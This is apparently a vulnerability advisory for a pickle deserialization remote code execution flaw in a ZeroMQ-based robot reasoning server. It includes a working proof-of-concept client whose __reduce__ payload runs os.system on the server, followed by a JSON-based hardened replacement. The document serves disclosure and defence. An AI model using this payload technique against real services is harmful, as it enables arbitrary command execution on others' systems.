Description
Summary
A critical Remote Code Execution (RCE) vulnerability exists in experiments.robot.bridge.reasoning_server::run_reasoning_server. The server accepts incoming messages and deserializes them using pickle.loads, which allows attackers to execute arbitrary code on the host system.
Details
The vulnerable code is located at experiments.robot.bridge.reasoning_server::run_reasoning_server.
The server listens for incoming messages via ZeroMQ (zmq). Received data is deserialized using pickle.loads(message):

```python
while True:
    message = socket.recv()
    inputs = pickle.loads(message)  # Unsafe deserialization
    result = model.raw_generate(*inputs)
    socket.send(pickle.dumps(result))
```

pickle is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization.
Proof of Concept (PoC)
- Start the vulnerable server:

```shell
PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py
```

- Run the following client code to send a malicious payload:

```python
import pickle, zmq

class Payload(object):
    def __reduce__(self):
        import os
        return (os.system, ('echo "hacked"',))

context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://127.0.0.1:5623")
socket.send(pickle.dumps(Payload()))
```

- The server will execute os.system('echo "hacked"'), demonstrating remote code execution.
Impact
- Attackers can remotely execute arbitrary system commands, leading to full server compromise.
- This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure.
Recommendation
- Never use pickle.loads on data from untrusted sources.
- Replace pickle with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs.
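The following is an added example of what the recommendation above looks like in practice; it is not code from the repository. It replaces pickle with JSON on the server side and validates the decoded message against a strict shape before anything reaches the model. The message layout (an object with a single "prompts" key holding a bounded list of strings), the size limits, and the `handle_message` / `decode_request` names are assumptions made for this example; the call `model.raw_generate(*inputs)` mirrors the vulnerable loop.

```python
import json
import pickle  # used only to build a constructed sample of what the server now rejects

# Hypothetical limits chosen for this example; tune them to the real workload.
MAX_MESSAGE_BYTES = 64 * 1024
MAX_PROMPTS = 8
MAX_PROMPT_CHARS = 4096


class BadRequest(ValueError):
    """Raised for any message that does not match the expected JSON shape."""


def decode_request(raw: bytes) -> list:
    """Decode a client message as UTF-8 JSON and validate it strictly.

    Returns the list of prompt strings. Pickle bytes, oversized messages,
    unexpected keys and non-string prompts are all rejected before use.
    """
    if len(raw) > MAX_MESSAGE_BYTES:
        raise BadRequest("message too large")
    try:
        obj = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        # Pickle streams fail here: they are neither UTF-8 nor JSON.
        raise BadRequest(f"not valid JSON: {exc}") from None
    if not isinstance(obj, dict) or set(obj) != {"prompts"}:
        raise BadRequest("expected an object with exactly one key: 'prompts'")
    prompts = obj["prompts"]
    if not isinstance(prompts, list) or not prompts or len(prompts) > MAX_PROMPTS:
        raise BadRequest(f"'prompts' must be a non-empty list of at most {MAX_PROMPTS} items")
    for p in prompts:
        if not isinstance(p, str) or len(p) > MAX_PROMPT_CHARS:
            raise BadRequest(f"each prompt must be a string of at most {MAX_PROMPT_CHARS} chars")
    return prompts


def encode_response(outputs) -> bytes:
    """Serialize model output as JSON; only plain strings are sent back."""
    return json.dumps({"outputs": [str(t) for t in outputs]}).encode("utf-8")


def handle_message(raw: bytes, generate) -> bytes:
    """Process one request. `generate` stands in for model.raw_generate.

    Validation failures produce a JSON error reply instead of an exception,
    so a malformed message cannot take the server loop down.
    """
    try:
        prompts = decode_request(raw)
    except BadRequest as exc:
        return json.dumps({"error": str(exc)}).encode("utf-8")
    return encode_response(generate(*prompts))


def serve_forever(socket, model):
    """Hardened replacement for the vulnerable loop (same ZeroMQ REQ/REP pattern)."""
    while True:
        socket.send(handle_message(socket.recv(), model.raw_generate))


# Constructed sample: a harmless pickled list, standing in for any pickle payload.
# The new decoder rejects it without ever calling pickle.loads.
PICKLED_SAMPLE = pickle.dumps(["hello"])
```

The client side changes in the same way: it sends `json.dumps({"prompts": [...]}).encode()` and parses the JSON reply. Because the decoder accepts only one fixed shape, a message that is not UTF-8 JSON with exactly that structure is answered with an error and never touches `pickle`, the model, or the filesystem.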